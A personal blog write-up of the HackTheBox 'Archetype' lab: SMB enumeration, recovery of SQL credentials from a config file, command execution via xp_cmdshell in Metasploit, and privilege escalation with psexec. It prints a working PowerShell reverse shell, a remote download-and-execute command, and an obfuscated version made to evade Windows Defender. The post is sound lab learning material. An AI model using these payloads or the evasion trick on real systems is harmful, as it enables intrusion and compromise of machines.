HackTheBox: Archetype

As today I had some time off, and I've only recently found https://app.hackthebox.eu, I've decided to spend some time on their "Starting Point" lab machine set and have some fun removing the rust from my memory.

The first machine we are doing a simple penetration test is called Archetype and apperentely it is a windows machine. Let us start by enumerating the services with nmap:

$nmap -sV -sC -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-03 19:43 CEST
Nmap scan report for
Host is up (0.093s latency).
Not shown: 65523 closed ports
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-04-03T18:03:14
|_Not valid after:  2051-04-03T18:03:14
|_ssl-date: 2021-04-03T18:07:42+00:00; +21m24s from scanner time.
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h45m24s, deviation: 3h07m50s, median: 21m23s
| ms-sql-info: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-04-03T11:07:33-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-03T18:07:36
|_  start_date: N/A

We can see that it is a windows machine with shared files via smb, without providing any user nor login. Let us see what we can list:

$smbclient -N -L \\\\

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

We can see that backups is accessible to everyone . When trying to connect without password:

$smbclient \\\\\\backups
Enter WORKGROUP\alacrau's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 13:20:57 2020
  ..                                  D        0  Mon Jan 20 13:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 13:23:02 2020

		10328063 blocks of size 4096. 8208731 blocks available
smb: \> 
smb: \> pwd
Current directory is \\\backups\
smb: \> get prod.dtsConfig 
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)

Let us now investigate the content of this prod.dtsConfig file:

        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>

We stumble on our first loot file, so looking through this configuration it looks like we are chasing a sql user, sql_svc:

  • username: sql_svc
  • password: M3g4c0rp123

Let us try to login with these credentials, but first let us search for any help on metasploit to see if we can find anything interesting:

msf6 > search mssql

Matching Modules

   #   Name                                                      Disclosure Date  Rank       Check  Description
   -   ----                                                      ---------------  ----       -----  -----------
   0   exploit/windows/misc/ais_esel_server_rce                  2019-03-27       excellent  Yes    AIS logistics ESEL-Server Unauth SQL Injection RCE
   1   auxiliary/server/capture/mssql                                             normal     No     Authentication Capture: MSSQL
   31  auxiliary/admin/mssql/mssql_exec                                           normal     No     Microsoft SQL Server xp_cmdshell Command Execution

So aux module 31 looks intersting (and quite notorious):

  This module will execute a Windows command on a MSSQL/MSDE instance 
  via the xp_cmdshell procedure. A valid username and password is 
  required to use this module


Let us use it (msf6 > use 31) and setup the exploit parameters:

msf6 > set PASSWORD M3g4c0rp123
PASSWORD => M3g4c0rp123
msf6 > set USERNAME sql_svc
USERNAME => sql_svc
msf6 > set RHOSTS
msf6 > set USE_WINDOWS_AUTHENT true
msf6 > use auxiliary/admin/mssql/mssql_exec
msf6 auxiliary(admin/mssql/mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   CMD                  cmd.exe /c echo OWNED  no        Command to execute
                         > C:\owned.exe
   PASSWORD             M3g4c0rp123            no        The password for the specified user
   RHOSTS                 yes       The target host(s), range CIDR iden
                                                         tifier, or hosts file with syntax '
   RPORT                1433                   yes       The target port (TCP)
   TDSENCRYPTION        false                  yes       Use TLS/SSL for TDS data "Force Enc
   USERNAME             sql_svc                no        The username to authenticate as
   USE_WINDOWS_AUTHENT  true                   yes       Use windows authentification (requi
                                                         res DOMAIN option set)

msf6 auxiliary(admin/mssql/mssql_exec) > exploit

After running this command we easily check that the machine is exploitable, as we obtain an output from our command, so we can start our process of trying to obtain a shell access over there. Our reverse shell, that we will kindly name lol.ps1, taken from https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1, will contain a hit to our local netcat listener:

$sm=(New-Object Net.Sockets.TCPClient('',4242)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Let us as well fire up our nc listener on port 4242 so it can wait for connections from our reverse shell above:

$nc -lvnp 4242
listening on [any] 4242 ..

Well now start a webserver to serve our reverse shell script so we can download it from inside the machine:

python -m http.server

This will spawn a http server on our machine at port 8000 in order to serve our powershell reverse shell. Then we set the command on metasploit, and run the exploit:

set CMD powershell 'IEX (New-Object Net.WebClient).DownloadString(\"\");'

We will then run this script and we can see that we obtain an Antivirus message for tryting to run our shell code:

msf6 auxiliary(admin/mssql/mssql_exec) > set CMD powershell 'IEX (New-Object Net.WebClient).DownloadString(\"\");'
CMD => powershell IEX (New-Object Net.WebClient).DownloadString(\"\");
msf6 auxiliary(admin/mssql/mssql_exec) > exploit
[*] Running module against

[*] - SQL Query: EXEC master..xp_cmdshell 'powershell IEX (New-Object Net.WebClient).DownloadString(\"\");'

 IEX : At line:1 char:1
 + $client = New-Object System.Net.Sockets.TCPClient("",4242 ...
 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 This script contains malicious content and has been blocked by your antivirus software.
 At line:1 char:1
 + IEX (New-Object Net.WebClient).DownloadString(" ...
 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
 + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.Inv

[*] Auxiliary module execution completed

In order to bypass this we will need to obfuscate our powershell code so that the Windows defender antivirus does not detect it. For this task we've used the ISESteroids obtainable from http://www.powertheshell.com/isesteroids/. After running the "Obfuscate" tool on our script we obtain a new one:

${____/\/=\/==\__/\}=(New-Object Net.Sockets.TCPClient($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MQAwAC4AMQAwAC4AMQA0AC4AMQA2ADcA'))),4242)).GetStream();[byte[]]${__/\_/=\_/\__/=\/}=0..65535|%{0};while((${___/\/=======\/\/}=${____/\/=\/==\__/\}.Read(${__/\_/=\_/\__/=\/},0,${__/\_/=\_/\__/=\/}.Length)) -ne 0){;${__/\/\/==\/=\/\_/}=(New-Object Text.ASCIIEncoding).GetString(${__/\_/=\_/\__/=\/},0,${___/\/=======\/\/});${_/==\___/=\/\__/=}=([text.encoding]::ASCII).GetBytes((iex ${__/\/\/==\/=\/\_/} 2>&1));${____/\/=\/==\__/\}.Write(${_/==\___/=\/\__/=},0,${_/==\___/=\/\__/=}.Length)}

So as we can see above, some of our var names were obfuscated and also our IP address was encoded with base64. When running now the exploit from metasploit we can see now a hit on our netcat session:

$nc -lvnp 4242
listening on [any] 4242 ...
connect to [] from (UNKNOWN) [] 49678


As we now have a shell we can start by going through the list of priviledge escalation, having a look into the check list in https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#system-info, and we have a hit when trying to check some command history:

type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!! exit

We can now use a tool to run a remote powershell session (https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/psexec.py) using our newly found credentials:

$python3 psexec.py administrator@
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file PtMMrPNw.exe
[*] Opening SVCManager on
[*] Creating service SGjW on
[*] Starting service SGjW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.


nt authority\system


As we now have an admin shell on this machine, we can then look around for the flags. We could found them on the "Desktop" folder of the admin:

 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\Administrator\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,834,831,872 bytes free

C:\Users\Administrator\Desktop>type root.txt

As we forgot previously, the user flag can be collected from the sql_svc user desktop folder:

 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,833,373,696 bytes free

C:\Users\sql_svc\Desktop>type user.txt

Easy but fun, this platform is quite cool so I guess I'll keep exploring, so please ping me if you have any doubt.

josé tapadas alves

josé tapadas alves

🪐 Recovering Telecommunications engineer and software tinkerer. Passionate Rubyist and JavaScript zealot. Nature, music and life enthusiast 🌱